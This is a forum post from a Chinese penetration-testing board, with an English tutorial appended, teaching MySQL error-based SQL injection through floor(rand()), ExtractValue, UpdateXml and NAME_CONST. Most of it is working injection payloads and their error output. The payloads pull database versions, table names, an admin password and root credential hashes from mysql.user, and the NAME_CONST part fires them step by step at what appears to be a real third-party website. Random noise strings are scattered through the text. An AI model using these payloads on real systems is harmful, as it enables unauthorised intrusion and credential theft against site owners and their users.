中国网络渗透测试联盟

标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]

作者: admin    时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
8 O# V- C" p1 d' A首先进行正常查询:

mysql> select * from article where id = 1;8 N: t, W% r, J1 G& @1 M
+—-+——-+———+
) ]' D5 A2 \- L$ w& L| id | title | content |! u1 l0 z! {: N6 G0 c
+—-+——-+———+0 Z) N  M9 U2 p, W* y  c! w8 N9 T
|  1 | test  | do it   |/ Y3 [# j, \6 o
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);/ d0 e7 F  k: X' ?: B  e+ ?
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。3 b- W+ b2 z. I7 V% |/ x
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
0 Q% I3 r0 D4 ~' J* l' ]: jERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));- s  g' j8 m: q& c/ K
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
8 C2 |" P' G5 H2 x# N! ?测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
$ {7 k- G. \5 z' @( d2 {ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’


1 F3 j3 w) x/ a) I4 U2 U  s% M3 x# W; e' s' S; d3 g

再收集:

; }# k+ Y. |" M/ j: L6 a' _
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) # G& E2 n% N" A9 I1 U: r* A7 T

: B: G; W. C5 j$ ~9 eErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
$ y/ P- T: m+ f! ?  P/ V1 i' Z/ `! v4 c6 I
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)2 p* j, G1 Q# a1 `, W
- L: Q8 P* B% ], {- U& ^
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
* h9 L  W5 |+ ~, Q: _* L8 R4 R" ]9 ^  _; s0 m+ @8 v$ Z, Z
MYSQL高版本报错注入技巧-利用NAME_CONST注入! b3 J& H8 [* d7 E; O8 w" ~
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. # y- W; `: w1 _+ T- z% A

5 t' L0 F  P) K
3 ?0 n7 M2 ]" V6 e4 W* k相关信息
9 _2 |. y! \* n' y3 i% N+ F/ z# d2 [, n4 J6 f( D  b
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
& M" L% x. O2 M1 \/ P1 x( q% B2 x  P" F6 m) A1 Y% E# W- n
Code:2 U4 K( t/ ^- K! W! k
NAME_CONST(DATA, VALUE)* j2 e2 r( g0 M' [* i% b5 m9 T1 j& U

5 |0 r3 R$ I- U9 _4 {Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
% X9 c" ?! f: W0 a+ z3 z2 _1 k& |# f
SELECT NAME_CONST('TEST', 1)& o, K9 s( g( m) s5 P

$ b- s: s2 t' v, j% Z
7 [8 |& Q+ I1 e# E2 @4 i& x- H0 E
' N, _5 k% p6 g0 R8 P2 \# F|---------------|# G9 c; ?; w) X1 ?5 _
|     TEST      |
1 d& a8 }% g! y! Z: ?|               |4 {4 v1 X' C+ Y: p1 X2 X
|---------------|$ S$ S+ a: j5 |9 Y
|       1       |# K" {+ P: }7 ?; A, n8 K
|               |
* w; }0 C( k5 G' N9 C, u|---------------|
# ?4 D$ E) D1 r$ a- N, ]) x" b

, w# g# v; Z! p7 M  ^
* G0 T2 ^; m  F* F& n0 O; N9 Z. ?* b0 F: \3 A2 j

0 a! b) r/ L. g; [http://dev.mysql.com/doc/refman/5.0/en/m...name-const! B4 m: `- X1 P# M+ s
Intro to MySQL Variables
4 p: Q6 ]. H6 p7 ~( [  A" A; L6 U1 k  |3 y6 e$ m
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
* q8 z# N7 L( |  V6 O0 D9 c6 q# |9 N# h! l, f& r2 [: \( v
Code:
* I5 e' {& F  v. u6 M% D  Fhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
0 b$ i! [9 I7 s4 w6 U$ C+ Q& f2 ^' M8 q* e) r5 V6 C
6 |% Y5 p2 K$ I& p2 f; S
1 P, O& c; N" F6 a9 K5 Y: P

: P, {5 w- ^2 x& m: P' H, Q3 E/ S6 w' i: B
Code:
- z4 t$ K4 d! {- ~; ~7 R) S" p: pand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
. r# W* l" V  w4 A; g. B: _& ]

  r8 S3 q% |& `' s  Y
+ q+ n. w5 p& [1 R2 d! pVAR = Your MySQL variable.
0 p+ w* ?0 y  u0 Q( b
0 k5 R8 V! k% S4 M" lMySQL 5.1.3 Server System Variables
! ]$ {8 @* t; I, y$ v. c) l0 Z) R3 x6 {2 B$ ~$ f* @+ F
Let's try it out on my site..
5 B$ f! y( c6 b. k+ ?
* i8 \7 j5 G1 `* y  a7 TCode:
* \, W6 }- Z% Ohttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--; Z4 G9 s1 i1 N1 O
- n9 a: o$ Q# m5 T0 V$ A
Erroruplicate column name '5.0.27-community-nt'
1 I6 A/ b. {, v( L

7 {" o/ u$ b. O( g3 T- F1 w& B. i; T0 C4 i4 I% z0 A* }: i
( K* y3 z1 d" p7 K: E. O- o
" u$ g3 B* G$ @3 l4 ^' M3 e; f
2 j2 F3 S. j/ W1 p) f8 ?3 Y* W
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again.../ t; E2 l# I. L  \( C+ T5 o

" l( A3 B6 q) u/ p+ V, P* QData Extraction9 V* k  P" w8 C$ R$ w* Z

* }5 ~1 Q, W2 J9 ]) PCode:( Y( {2 F; F0 \$ ]
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--' p1 ?4 r+ T; [: D2 P( G7 v
2 B3 ]  ]5 z% K% l9 o* d7 K

# |! a2 W4 F; ^4 s# o: G0 aWe should get a duplicate column 1 error...' e9 I0 R; _* ^% m/ D( l7 A

6 \( |9 z) H3 R+ }, P( T1 }Code:2 B" p1 z  \* c8 l0 u# ~. z' |
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
! S3 _; {0 w& `8 ?" Q! k0 d! E  D# }2 d# V/ N  O2 E6 f
Erroruplicate column name '1
, ?( _& F0 r/ Q) w6 x% J
1 p3 E9 H$ }4 w0 |3 A! q3 e
# _: z# j+ K# v9 i0 w! o# M7 p

6 u2 N& |" a$ _8 X; [3 E/ G9 t* v: |% q0 z% b% [

$ E3 W/ W+ z0 ?: W9 Y: C3 ~5 p! q
: y+ B6 A7 }1 X  @+ }6 iNow let's get the tables out this bitch..
. Y1 J2 g% l' ]" c( M+ R5 i. f" O, B2 Z2 Y# c2 w. H. g
Code:  P9 D) x8 M, Z/ t( V
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
* E3 ^, d5 _& \0 N. p* x

0 d: m! O! U5 I- R: l. z
& h7 ?. ]1 {* n2 NLet's see if it works here, if it does, we can go on and finish the job.
' r! n) `" @' B
. y: `6 W! M6 \8 G9 ~3 ]Code:$ ~- X0 P- L1 e$ m: c7 {+ Z
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--1 e+ _& v4 L" f1 g9 ]
) s6 {0 k0 b0 v

+ r- Q. o% ?0 N& x: P5 n6 v2 iErroruplicate column name 'com_admanage
3 O6 N5 n/ c1 d: O4 b; t
: T8 h# J4 y" ]8 l

& T- D7 X7 K* d6 K* R; Y$ V! r: d2 H

9 V' \8 U' n/ Z* V0 e3 V- X

2 R" K! i3 t6 U4 ^* |
# n6 _0 r5 |3 X  {1 X9 G. r, MNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
# J# T: O) W7 P# S" ?
: y& ^. K( A, z! P0 A- `Let's get the columns out of the user table..) k# H7 B5 t# a8 Y

( G% _7 K% K/ f6 m2 u  @Code:- b: R( I3 J7 ?# i& V$ I: ?
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
+ R& U4 {+ [- M, c. ?
2 `/ K* T, \" J/ G) c; `
& m2 N6 S4 F# S
So mine looks like this, and I get the duplicate column name 'Host'.
4 t7 G, _' N% U: R8 w* B2 V- v0 I) @3 k" ^! X3 [
Code:6 Q, z( B5 a! m' Z) s
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
9 g" n, q) r0 B+ w1 a( H/ L% ^
+ l$ m0 o) O& y4 N& ZErroruplicate column name 'Host'! z( J1 Y9 w% v  ~) ]; ^$ l, p4 [

% H, Q# a. l0 `4 x$ a$ M. b* i- ?9 C8 F" o
4 K* U+ P+ ^, D5 c' u; H

7 ~2 _7 V4 b/ B. ?! |

+ t! j1 {; j) o1 `, X+ ^# }4 V6 D0 D( w- C& y1 a
Woot, time to finish this bitch off.
/ s7 g2 e7 }$ [/ s
6 X/ p, p2 q) C8 [Code:1 L4 Y( ]  g7 C4 k# g2 A9 Y
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--6 l! X# k. z" b' _7 e" z3 t

# e/ r" }/ V7 l. D
( e4 q& i7 [6 ]& ]# U3 fSo mine looks like this...
' G0 z& s# m" E8 M6 b
; m1 L/ G: j& [* E' D( aCode:
& B  j- v2 D. Q- [http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--, M& p: d# H2 o
7 Q& Q1 ^$ [5 k( {( ~( {
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
+ T5 ]; y1 s: W, r8 U

2 J6 j. j9 t' f, y; G$ K5 i% l* W! `3 M5 \! n: p/ a6 Z! n/ u
2 j( g6 J7 j3 p# M1 P
2 }) L$ s. g* v0 Q! L8 ]+ q1 f2 i( B  w
# H# S- h' Q* n4 _- _
  i$ v7 g1 V- C$ e$ U6 w: p0 I3 L
And there we have it, thanks for reading.

' W4 B8 O: W# C/ C& V  P+ z8 x1 n& d5 `% Z) ~* N





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2